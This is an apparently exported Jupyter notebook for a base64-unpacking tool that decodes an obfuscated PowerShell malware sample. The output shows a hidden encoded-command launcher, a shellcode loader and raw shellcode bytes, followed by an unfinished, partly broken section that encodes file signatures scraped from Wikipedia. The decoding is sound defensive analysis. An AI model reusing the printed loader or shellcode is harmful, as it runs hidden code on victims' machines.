AEEAWAB5AEYATgBxADkAMwBxAHEATwBWAFYAVwByAE0ATABkADcASwBWAHgAcQBiAHQAUwBXAEMAOABWAFYAbABUAG4ARAB6AGsAaABOAGsAQwBGAEwAaQBJAFQAWgBIAFkAdABLAHkAWABTAE8AZgBOADYALwBhAGsAVgBWAEcAZgAxAFgAZQA3AFYAYgBOADUAMAAzADMAWgBSAHIAMgBxAGsAaQBZAFEARABkAHYAMwBwAFQAdABnAHoARQB3AHEANgBqAFUAZgBhAHoALwAzAG0ANgBRAG8AZgBsAHkAWAB4AGcAYwBqAEsAbgB0ADgAdQAzAGMAdQBpAHgAMABYACsAeQB3AFYAdwBzAGMAMgA3AHUALwA2AGsAMwBxAHcATAB0ADEAVgBrADMAdQB6ADgAZABHAGEAMgA3ADEALwBkAFgAZQB1AEwAYwBhAG0ALwAvAFoAaQB4AHIAYgA1ADMAeQBSAHoATQB3AGkARwBlAEgAYQB6AHEASgA0AG4AUwA5AFMAZAB4AEoAWgBZAGIAMgAwAE8AbABPAHoAOABRAFUAVgBHAHkAUABjAEQAUQB5AHcAYQB6AEoAdABiAG0AWgBzAG4AbQAvAG0AYgA2AHoATwAvAG8ATwA4AHMAaQBhAHQAOABkAFIAMQBVAE8AOQBMAHQAVAA3AGwAbgBmAEgAVQA3AE4AegBoAGcAVABTADcAagAwAC8ANQA0AHIAMwBYAHgARwAzADAAZwBsAEMAMQBVADIAbQBLACsAcgBRAHAAMQBxAGEANwBLAFkANQAyAFYAOABBAC8AUABkADUAcgA0AFcAcQBoADIAVwB4AEYAOQBEAE4ARQA2AHMANQB6AHYAagBJAHIARQBUAFQAdQBmAEsAQgBCAEIAMwAvADIARwB4AFYAZQBqAG0AUQBaAHUARAA3AGQAegBNAEMAWAB4AFUAawByAGIANQBaAEUAYQAyAHIATwA3ADMAQwBYAHoAQwBvAEkAZQBGAGYAWABxAEwAdABIAGEARwBDAFQAbwB0AEUARwA4AEMAcgBpAE8AZgA4AGgATQBLADgASwBuAG4ARABXACsAWAB6ACsAYwBIAE0AMwBuAFgAWQB1AHcAUQBaAHgAMwBiAFcAWQArAFoAUQAzADgAZABZAFEAQwBLAHgAQwBUAFEAZQBoAE8AawBKAG0AYQBYAE8ALwBhAHcAdwA1ADIARABhAFoARgBnAGUAZAB5AHkASQBSAHEAQQByAG4AagBiADYARgBqAGMAOABXAG8AOQAxAEUAeAAxADYAcABhACsAeABiAHQAWQAxAHQARgBDAC8ATgB4ADkAcQBWAFUAWQBZAEwAYgBsADcAcwAwAGoANgAwAFMAKwBZAGoAbQBYAFgANABxAG4AbgBqAHIAVQBxAFgANQBiAG4AVgBEAHUAOQBMAE4AeABLAGgAMgA5AHYAZgBJAEwAWABPAE0AbgBHAG0AcgBNAEwAMQBPAHEAbgAvAC8ANgBYAHgAOQByAEEAZgBiAEQAQwBIAEgASQBMAG0AZQBhAHgAOABEAGUARQAzADAAaABZADQARgBDAHoAaQAwAEwAUwAzAEIANgB3AHQAOQBUADMASwBZAGYAaQBBADgAZQBSAFkATAB4AEQAbgB3AG8ANgBhADkAaQArADYASgA0AHcAUQBTAFcATgBmAFEAbAAyAGMAdwByAEoAYwBlAG4ATwBsAEsAOQA4AEoAOQBSACsAZAAvAEwAagAxADgAZQBNAGMARABFAGsATABVAFYAUQBZAGMAbAAzAHEATwBYAEsAVABMAFQAeQBYAEMAdwBWAG8AdgA0AFgAbgBTAGsASABQAHYATgAvACsAcQB0AGcAZAB0AE8ALwBTAHMAbABFAEgAUAA0AEgAeQA5AEMASQBlAFgANgBSAG4ARQBxAGcAMwBjAGcATQAxAGkALwB5AGYAcwBVADcAcgBaAEgAegAxAFAAOABmADYAeAA5ADcAZgBuAEwANABMAC8AMABMADIARgBLAFIAWABoAHoAOQB2AC8AQgBOADMALwBIAHUASQBMAE0AdwBrAHMASQA2AGgASAAzAEMAYQBUAEQAVAB2AFIAUwBvAE4AdwBKAFAANQA4AGMAVABUAEUARwBIAHIAOQBJAG4ARwAvAFUARQBvAEwALwBvAHcAWABXAGIAVQBUADUAbABNAGUANgAyAGMASQBCAFMAdwBGAHgAagAwADYAUgBmAGwAVwBvADkAbQB4AGsAQgBpAFgAMQA0ADgAaQBoAFgAOABGAGMAUwB0AFUAegB2AEgAdQB0AEsAdQB6ADUAUgB6AHIASAB4AFQATABnAEEAVQBGAEoAUgBMADgARwB2AGcATwAyAEgAVQBSADUAWABrAFQAKwBlAHIAcwBnAGQAVABZAHMAYQB2AHkAbwBqAGEARgBNAGIAZgBpADQANQBZAFEAWAArAGsATQBBADUARgBvAG0ATQBoAEUAVABIAHMALwBRAFUANQBGAHAAdQBCAE8AZwAwAEEAQQBBAD0APQAiACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA=='''
(x, output_files) = unpack_base64_items(input_string=input_str)
#print('Input String:\n', input_str)
print('Output String:\n', x)
#print('output_files', output_files[['decoded_string', 'encoding_type', 'file_type', 'md5', 'sha1', 'sha256']])   # (output, dec_string) = decode_base64_string(fstring)
from IPython.display import display

display(output_files)


Output String:
 powershell.exe  -nop -w hidden -encodedcommand <decoded type='string' index='1.0'>$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("<decoded type='string' index='2.0'>Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	
	return $var_unsafe_native_methods.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [

Unnamed: 0,decoded_string,encoding_type,file_hashes,file_type,input_bytes,md5,original_string,reference,sha1,sha256
0,"$s=New-Object IO.MemoryStream(,[Convert]::From...",utf-16,"{'md5': '7eb62685470dd5cc727070a0d2e14429', 's...",,b'$\x00s\x00=\x00N\x00e\x00w\x00-\x00O\x00b\x0...,7eb62685470dd5cc727070a0d2e14429,JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE...,1.0,76050ca7b230deacd50e2829be0bd62af491d319,00fc93fb3bc7fbf8671019e8e69629c1bbe2d672998b02...
1,Set-StrictMode -Version 2\n\n$DoIt = @'\nfunct...,utf-8,"{'md5': 'dd04aa217c8abfb527dc1df3c70bd868', 's...",gzip_file,b'Set-StrictMode -Version 2\n\n$DoIt = @\'\nfu...,dd04aa217c8abfb527dc1df3c70bd868,H4sIAAAAAAAAAL1XeW/buBL/O/4UwiKAJNTxnWxSIEAp36...,2.0,921bef2bc138dce83a5cb227e218e01489adf9fe,55ce084c3fc194037670ddc344afb37917f5c3c521aa25...
2,"[fc, e8, 89, 00, 00, 00, 60, 89, e5, 31, d2, 6...",binary,"{'md5': 'd532334ece4d69e29168240b2c39e682', 's...",,b'\xfc\xe8\x89\x00\x00\x00`\x89\xe51\xd2d\x8bR...,d532334ece4d69e29168240b2c39e682,/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPG...,3.0,3275d01bf7db9078a09b7de36c7c2821598a6a9f,ef0a1b51fd3e4bccbc60c9c00c2802e7baeb6ba2cf60a7...


In [173]:
print(output_files[['decoded_string']].at[2, 'decoded_string'])

['fc', 'e8', '89', '00', '00', '00', '60', '89', 'e5', '31', 'd2', '64', '8b', '52', '30', '8b', '52', '0c', '8b', '52', '14', '8b', '72', '28', '0f', 'b7', '4a', '26', '31', 'ff', '31', 'c0', 'ac', '3c', '61', '7c', '02', '2c', '20', 'c1', 'cf', '0d', '01', 'c7', 'e2', 'f0', '52', '57', '8b', '52', '10', '8b', '42', '3c', '01', 'd0', '8b', '40', '78', '85', 'c0', '74', '4a', '01', 'd0', '50', '8b', '48', '18', '8b', '58', '20', '01', 'd3', 'e3', '3c', '49', '8b', '34', '8b', '01', 'd6', '31', 'ff', '31', 'c0', 'ac', 'c1', 'cf', '0d', '01', 'c7', '38', 'e0', '75', 'f4', '03', '7d', 'f8', '3b', '7d', '24', '75', 'e2', '58', '8b', '58', '24', '01', 'd3', '66', '8b', '0c', '4b', '8b', '58', '1c', '01', 'd3', '8b', '04', '8b', '01', 'd0', '89', '44', '24', '24', '5b', '5b', '61', '59', '5a', '51', 'ff', 'e0', '58', '5f', '5a', '8b', '12', 'eb', '86', '5d', '68', '6e', '65', '74', '00', '68', '77', '69', '6e', '69', '54', '68', '4c', '77', '26', '07', 'ff', 'd5', 'e8', '80', '00', '00', '00

## Experimental section pulling down additional file types from Wikipedia
Under construction

In [11]:
file_sigs_tables = pd.read_html('https://en.wikipedia.org/wiki/List_of_file_signatures', header=0)

In [44]:
def hex_sig_converter(cell):
    import re
    if('(' in cell):
        return re.sub('\s*\([^)]+\)\s*', '\n', cell)
    else:
        return cell

def extension_converter(cell):
    from textwrap import wrap
    if(cell and cell.strip() and len(cell) >= 6 and ' ' not in cell):
        return cell[0:3]
    else:
        return cell
                             

file_sigs_tables2 = pd.read_html('https://en.wikipedia.org/wiki/List_of_file_signatures', 
                                header=0, converters={'Hex signature':hex_sig_converter, 'File extension':extension_converter}, encoding=None)
file_sigs_tables2[0]

Unnamed: 0,Hex signature,ISO 8859-1,Offset,File extension,Description
0,a1 b2 c3 d4 d4 c3 b2 a1,¡²ÃÔ ÔÃ²¡,0,pcap,Libpcap File Format[1]
1,0a 0d 0d 0a,....,0,pca,PCAP Next Generation Dump File Format[2]
2,ed ab ee db,....,0,rpm,RedHat Package Manager (RPM) package [3]
3,53 50 30 31,SP01,0,bin,Amazon Kindle Update Package [4]
4,00,.,0,PIC,IBM Storyboard bitmap file Windows Program Information File Mac Stuffit Self-Extracting Archive IRIS OCR data file
5,00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00,........ ........ ........,11,PDB,PalmPilot Database/Document File
6,BE BA FE CA,...,0,DBA,Palm Desktop Calendar Archive
7,00 01 42 44,..BD,0,DBA,Palm Desktop To Do Archive
8,00 01 44 54,..DT,0,TDA,Palm Desktop Calendar Archive
9,00 01 00 00,...,0,,Palm Desktop Data File (Access format)


In [12]:
def encode_part_string(hex_string):
    try:
        sig_bytes = bytes.fromhex((hex_string.replace(' ', '')))
        encoded_string = base64.b64encode(sig_bytes).decode('utf-8')
        return encoded_string.replace('=', '')
    except:
        return None
        
def encode_sig_to_bas64(hex_string):
    """Get additional file signatures from Wikipedia"""
    if '\n' in hex_string:
        inputs = hex_string.split('\n')
    else:
        inputs = [hex_string]

    str_start = 0
    for input_str in inputs:
        output_string = ''
        if '??' in input_str:
            matched = re.search(r'(?P<wild_cards>\?\?\s*{1:})', input_str)
            str_end = matched.start() - 1
            output_string = encode_part_string(input_str[str_start:str_end])
            num_wild_cards = matched..groupdict()['wild_cards'].count('??')
            re_expression = 
            print('wild_cards', num_wild_cards)
    if '(big endian format)' in hex_string:
        hex_strings = hex_string.split('(big endian format)')
        print('endian')
        print(hex_strings)
    
    print('In:', hex_string, 'Bytes:', sig_bytes, 'Out:', encoded_string, 'type', type(encoded_string))
    if encoded_string:
        return encoded_string.replace('=', '')

file_sigs_src_tables = pd.read_html('https://en.wikipedia.org/wiki/List_of_file_signatures', header=0)
file_signatures = file_sigs_src_tables[0].copy()
file_signatures['EncodedSignature'] = file_signatures.apply(lambda x: encode_sig_to_bas64(x['Hex signature']), axis=1)
file_signatures

In: a1 b2 c3 d4 d4 c3 b2 a1 Bytes: b'\xa1\xb2\xc3\xd4\xd4\xc3\xb2\xa1' Out: obLD1NTDsqE= type <class 'str'>
In: 0a 0d 0d 0a Bytes: b'\n\r\r\n' Out: Cg0NCg== type <class 'str'>
In: ed ab ee db Bytes: b'\xed\xab\xee\xdb' Out: 7avu2w== type <class 'str'>
In: 53 50 30 31 Bytes: b'SP01' Out: U1AwMQ== type <class 'str'>
In: 00 Bytes: b'\x00' Out: AA== type <class 'str'>
In: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Bytes: b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' Out: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA type <class 'str'>
In: BE BA FE CA Bytes: b'\xbe\xba\xfe\xca' Out: vrr+yg== type <class 'str'>
In: 00 01 42 44 Bytes: b'\x00\x01BD' Out: AAFCRA== type <class 'str'>
In: 00 01 44 54 Bytes: b'\x00\x01DT' Out: AAFEVA== type <class 'str'>
In: 00 01 00 00 Bytes: b'\x00\x01\x00\x00' Out: AAEAAA== type <class 'str'>
In: 00 00 01 00 Bytes: b'\x00\x00\x01\x00' Out: AAABAA== type <class 'str'>
In: 66 74 79 70 33 67 Byt

Unnamed: 0,Hex signature,ISO 8859-1,Offset,File extension,Description,EncodedSignature
0,a1 b2 c3 d4 d4 c3 b2 a1,¡²ÃÔ ÔÃ²¡,0,pcap,Libpcap File Format[1],obLD1NTDsqE
1,0a 0d 0d 0a,....,0,pcapng,PCAP Next Generation Dump File Format[2],Cg0NCg
2,ed ab ee db,....,0,rpm,RedHat Package Manager (RPM) package [3],7avu2w
3,53 50 30 31,SP01,0,bin,Amazon Kindle Update Package [4],U1AwMQ
4,00,.,0,PICPIFSEAYTR,IBM Storyboard bitmap file Windows Program Inf...,AA
5,00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0...,........ ........ ........,11,PDB,PalmPilot Database/Document File,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
6,BE BA FE CA,...,0,DBA,Palm Desktop Calendar Archive,vrr+yg
7,00 01 42 44,..BD,0,DBA,Palm Desktop To Do Archive,AAFCRA
8,00 01 44 54,..DT,0,TDA,Palm Desktop Calendar Archive,AAFEVA
9,00 01 00 00,...,0,,Palm Desktop Data File (Access format),AAEAAA


In [51]:
# base64_header_types = {
#     'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug': 'exe',
#     'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAA4fug': 'dll',
#     'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug': 'sys',
#     'UEsDBBQAAAAIA': 'zip',
#     'UEsDBBQAAQAIA': 'zip (passprotected)',
#     'H4sI': 'gz',
#     'N3q8ryccAAR': '7z',
#     'UmFyIRoHAM': 'rar',
#     'JVBERi0xLjcNC': 'pdf',
#     '0M8R4KGxGuE': 'msi',
#     'TVNXSU0AAADQ': 'wim'}

file_signatures[90:]

Unnamed: 0,Hex signature,ISO 8859-1,Offset,File extension,Description,EncodedSignature
90,46 4C 49 46,FLIF,0,flif,Free Lossless Image Format,RkxJRg
91,1A 45 DF A3,.Eß£,0,mkvmkamksmk3dwebm,"Matroska media container, including WebM",GkXfow
92,4D 49 4C 20,MIL,0,stg,"""SEAN : Session Analysis"" Training file. Also ...",TUlMIA
93,41 54 26 54 46 4F 52 4D ?? ?? ?? ?? 44 4A 56,AT&TFORM....DJV,0,djvudjv,DjVu documentThe following byte is either 55 (...,
94,30 82,0.,0,der,DER encoded X.509 certificate,MII
95,44 49 43 4D,DICM,0x80,dcm,DICOM Medical File Format,RElDTQ
96,77 4F 46 46,wOFF,0,woff,WOFF File Format 1.0,d09GRg
97,77 4F 46 32,wOF2,0,woff2,WOFF File Format 2.0,d09GMg
98,3c 3f 78 6d 6c 20,<?xml,0,XML,eXtensible Markup Language when using the ASCI...,PD94bWwg
99,00 61 73 6d,.asm,0,wasm,WebAssembly binary format[39],AGFzbQ


In [44]:
def hex_sig_converter(cell):
    import re
    if('(' in cell):
        return re.sub('\s*\([^)]+\)\s*', '\n', cell)
    else:
        return cell

def extension_converter(cell):
    from textwrap import wrap
    if(cell and cell.strip() and len(cell) >= 6 and ' ' not in cell):
        return cell[0:3]
    else:
        return cell
                             

file_sigs_tables2 = pd.read_html('https://en.wikipedia.org/wiki/List_of_file_signatures', 
                                header=0, converters={'Hex signature':hex_sig_converter, 'File extension':extension_converter}, encoding=None)
file_sigs_tables2[0]

Unnamed: 0,Hex signature,ISO 8859-1,Offset,File extension,Description
0,a1 b2 c3 d4 d4 c3 b2 a1,¡²ÃÔ ÔÃ²¡,0,pcap,Libpcap File Format[1]
1,0a 0d 0d 0a,....,0,pca,PCAP Next Generation Dump File Format[2]
2,ed ab ee db,....,0,rpm,RedHat Package Manager (RPM) package [3]
3,53 50 30 31,SP01,0,bin,Amazon Kindle Update Package [4]
4,00,.,0,PIC,IBM Storyboard bitmap file Windows Program Information File Mac Stuffit Self-Extracting Archive IRIS OCR data file
5,00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00,........ ........ ........,11,PDB,PalmPilot Database/Document File
6,BE BA FE CA,...,0,DBA,Palm Desktop Calendar Archive
7,00 01 42 44,..BD,0,DBA,Palm Desktop To Do Archive
8,00 01 44 54,..DT,0,TDA,Palm Desktop Calendar Archive
9,00 01 00 00,...,0,,Palm Desktop Data File (Access format)


In [27]:
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 50)
pd.set_option('display.max_colwidth', 200)
file_sigs_tables[0]

Unnamed: 0,Hex signature,ISO 8859-1,Offset,File extension,Description
0,a1 b2 c3 d4 d4 c3 b2 a1,¡²ÃÔ ÔÃ²¡,0,pcap,Libpcap File Format[1]
1,0a 0d 0d 0a,....,0,pcapng,PCAP Next Generation Dump File Format[2]
2,ed ab ee db,....,0,rpm,RedHat Package Manager (RPM) package [3]
3,53 50 30 31,SP01,0,bin,Amazon Kindle Update Package [4]
4,00,.,0,PICPIFSEAYTR,IBM Storyboard bitmap file Windows Program Information File Mac Stuffit Self-Extracting Archive IRIS OCR data file
5,00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00,........ ........ ........,11,PDB,PalmPilot Database/Document File
6,BE BA FE CA,...,0,DBA,Palm Desktop Calendar Archive
7,00 01 42 44,..BD,0,DBA,Palm Desktop To Do Archive
8,00 01 44 54,..DT,0,TDA,Palm Desktop Calendar Archive
9,00 01 00 00,...,0,,Palm Desktop Data File (Access format)
